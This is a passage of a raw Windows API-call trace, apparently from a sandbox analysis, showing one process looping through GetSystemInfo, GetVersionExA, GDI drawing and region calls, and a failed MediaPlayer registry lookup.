dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.536] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.536] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.536] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.536] BeginPath (hdc=0x0) returned 0 [0087.536] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.536] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.536] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.536] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.536] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.536] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.536] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.536] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.536] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x340401d9 [0087.536] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x320401dc [0087.536] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406c8 [0087.536] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406c9 [0087.536] CombineRgn (hrgnDst=0x50406c8, hrgnSrc1=0x340401d9, hrgnSrc2=0x320401dc, iMode=1) returned 1 [0087.537] CombineRgn (hrgnDst=0x30406c9, hrgnSrc1=0x340401d9, hrgnSrc2=0x320401dc, iMode=4) returned 2 [0087.537] CreateSolidBrush (color=0xff) returned 0x41006c7 [0087.537] CreateSolidBrush (color=0xff0000) returned 0x51006cc [0087.537] DeleteObject (ho=0x51006cc) returned 1 [0087.537] DeleteObject (ho=0x320401dc) returned 1 [0087.537] DeleteObject (ho=0x340401d9) returned 1 [0087.537] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.537] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.537] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.537] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.537] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.537] BeginPath (hdc=0x0) returned 0 [0087.537] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.537] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.537] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.537] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.537] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.537] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.537] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.537] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.537] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x330401dc [0087.537] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x350401d9 [0087.537] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406cd [0087.537] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406d4 [0087.537] CombineRgn (hrgnDst=0x30406cd, hrgnSrc1=0x330401dc, hrgnSrc2=0x350401d9, iMode=1) returned 1 [0087.537] CombineRgn (hrgnDst=0x50406d4, hrgnSrc1=0x330401dc, hrgnSrc2=0x350401d9, iMode=4) returned 2 [0087.537] CreateSolidBrush (color=0xff) returned 0x61006cc [0087.537] CreateSolidBrush (color=0xff0000) returned 0x31006d5 [0087.537] DeleteObject (ho=0x31006d5) returned 1 [0087.537] DeleteObject (ho=0x350401d9) returned 1 [0087.537] DeleteObject (ho=0x330401dc) returned 1 [0087.537] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.537] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.537] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.537] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.537] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.537] BeginPath (hdc=0x0) returned 0 [0087.537] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.537] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.537] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.537] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.537] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.537] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.538] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.538] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.538] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x360401d9 [0087.538] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x340401dc [0087.538] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406d6 [0087.538] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406d7 [0087.538] CombineRgn (hrgnDst=0x50406d6, hrgnSrc1=0x360401d9, hrgnSrc2=0x340401dc, iMode=1) returned 1 [0087.538] CombineRgn (hrgnDst=0x30406d7, hrgnSrc1=0x360401d9, hrgnSrc2=0x340401dc, iMode=4) returned 2 [0087.538] CreateSolidBrush (color=0xff) returned 0x41006d5 [0087.538] CreateSolidBrush (color=0xff0000) returned 0x51006da [0087.538] DeleteObject (ho=0x51006da) returned 1 [0087.538] DeleteObject (ho=0x340401dc) returned 1 [0087.538] DeleteObject (ho=0x360401d9) returned 1 [0087.538] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.538] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.538] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.538] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.538] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.538] BeginPath (hdc=0x0) returned 0 [0087.538] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.538] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.538] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.538] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.538] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.538] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.538] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.538] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.538] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x350401dc [0087.538] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x370401d9 [0087.538] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406db [0087.538] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406e0 [0087.538] CombineRgn (hrgnDst=0x30406db, hrgnSrc1=0x350401dc, hrgnSrc2=0x370401d9, iMode=1) returned 1 [0087.538] CombineRgn (hrgnDst=0x50406e0, hrgnSrc1=0x350401dc, hrgnSrc2=0x370401d9, iMode=4) returned 2 [0087.538] CreateSolidBrush (color=0xff) returned 0x61006da [0087.538] CreateSolidBrush (color=0xff0000) returned 0x31006e1 [0087.538] DeleteObject (ho=0x31006e1) returned 1 [0087.538] DeleteObject (ho=0x370401d9) returned 1 [0087.538] DeleteObject (ho=0x350401dc) returned 1 [0087.539] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.539] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.539] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.539] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.539] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.539] BeginPath (hdc=0x0) returned 0 [0087.539] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.539] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.539] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.539] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.539] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.539] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.539] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.539] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.539] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x380401d9 [0087.539] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x360401dc [0087.539] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406e2 [0087.539] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406e3 [0087.539] CombineRgn (hrgnDst=0x50406e2, hrgnSrc1=0x380401d9, hrgnSrc2=0x360401dc, iMode=1) returned 1 [0087.539] CombineRgn (hrgnDst=0x30406e3, hrgnSrc1=0x380401d9, hrgnSrc2=0x360401dc, iMode=4) returned 2 [0087.539] CreateSolidBrush (color=0xff) returned 0x41006e1 [0087.539] CreateSolidBrush (color=0xff0000) returned 0x51006e6 [0087.539] DeleteObject (ho=0x51006e6) returned 1 [0087.539] DeleteObject (ho=0x360401dc) returned 1 [0087.539] DeleteObject (ho=0x380401d9) returned 1 [0087.539] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.539] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.539] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.539] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.539] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.539] BeginPath (hdc=0x0) returned 0 [0087.539] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.539] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.539] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.539] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.539] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.539] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.539] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.539] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.540] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x370401dc [0087.540] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x390401d9 [0087.540] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406e7 [0087.540] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406b2 [0087.540] CombineRgn (hrgnDst=0x30406e7, hrgnSrc1=0x370401dc, hrgnSrc2=0x390401d9, iMode=1) returned 1 [0087.540] CombineRgn (hrgnDst=0x50406b2, hrgnSrc1=0x370401dc, hrgnSrc2=0x390401d9, iMode=4) returned 2 [0087.540] CreateSolidBrush (color=0xff) returned 0x61006e6 [0087.540] CreateSolidBrush (color=0xff0000) returned 0x31006b3 [0087.540] DeleteObject (ho=0x31006b3) returned 1 [0087.540] DeleteObject (ho=0x390401d9) returned 1 [0087.540] DeleteObject (ho=0x370401dc) returned 1 [0087.540] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.540] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.540] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.540] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.540] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.540] BeginPath (hdc=0x0) returned 0 [0087.540] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.540] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.540] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.540] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.540] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.540] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.540] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.540] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.540] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3a0401d9 [0087.540] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x380401dc [0087.540] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406be [0087.540] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406bf [0087.540] CombineRgn (hrgnDst=0x50406be, hrgnSrc1=0x3a0401d9, hrgnSrc2=0x380401dc, iMode=1) returned 1 [0087.540] CombineRgn (hrgnDst=0x30406bf, hrgnSrc1=0x3a0401d9, hrgnSrc2=0x380401dc, iMode=4) returned 2 [0087.540] CreateSolidBrush (color=0xff) returned 0x41006b3 [0087.540] CreateSolidBrush (color=0xff0000) returned 0x51006ca [0087.540] DeleteObject (ho=0x51006ca) returned 1 [0087.540] DeleteObject (ho=0x380401dc) returned 1 [0087.540] DeleteObject (ho=0x3a0401d9) returned 1 [0087.540] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.540] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.540] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.541] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.541] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.541] BeginPath (hdc=0x0) returned 0 [0087.541] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.541] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.541] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.541] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.541] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.541] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.541] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.541] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.541] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x390401dc [0087.541] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3b0401d9 [0087.541] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406cb [0087.541] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406d8 [0087.541] CombineRgn (hrgnDst=0x30406cb, hrgnSrc1=0x390401dc, hrgnSrc2=0x3b0401d9, iMode=1) returned 1 [0087.541] CombineRgn (hrgnDst=0x50406d8, hrgnSrc1=0x390401dc, hrgnSrc2=0x3b0401d9, iMode=4) returned 2 [0087.541] CreateSolidBrush (color=0xff) returned 0x61006ca [0087.541] CreateSolidBrush (color=0xff0000) returned 0x31006d9 [0087.541] DeleteObject (ho=0x31006d9) returned 1 [0087.541] DeleteObject (ho=0x3b0401d9) returned 1 [0087.541] DeleteObject (ho=0x390401dc) returned 1 [0087.541] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.541] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.541] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.541] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.541] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.541] BeginPath (hdc=0x0) returned 0 [0087.541] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.541] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.541] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.541] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.541] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.541] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.541] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.541] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.541] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3c0401d9 [0087.541] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3a0401dc [0087.541] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x50406e4 [0087.542] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30406e5 [0087.542] CombineRgn (hrgnDst=0x50406e4, hrgnSrc1=0x3c0401d9, hrgnSrc2=0x3a0401dc, iMode=1) returned 1 [0087.542] CombineRgn (hrgnDst=0x30406e5, hrgnSrc1=0x3c0401d9, hrgnSrc2=0x3a0401dc, iMode=4) returned 2 [0087.542] CreateSolidBrush (color=0xff) returned 0x41006d9 [0087.542] CreateSolidBrush (color=0xff0000) returned 0x210026e [0087.542] DeleteObject (ho=0x210026e) returned 1 [0087.542] DeleteObject (ho=0x3a0401dc) returned 1 [0087.542] DeleteObject (ho=0x3c0401d9) returned 1 [0087.542] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.542] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.542] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.542] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.542] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.542] BeginPath (hdc=0x0) returned 0 [0087.542] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.542] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.542] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.542] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.542] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.542] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.542] RtlUnwind (TargetFrame=0x181840, 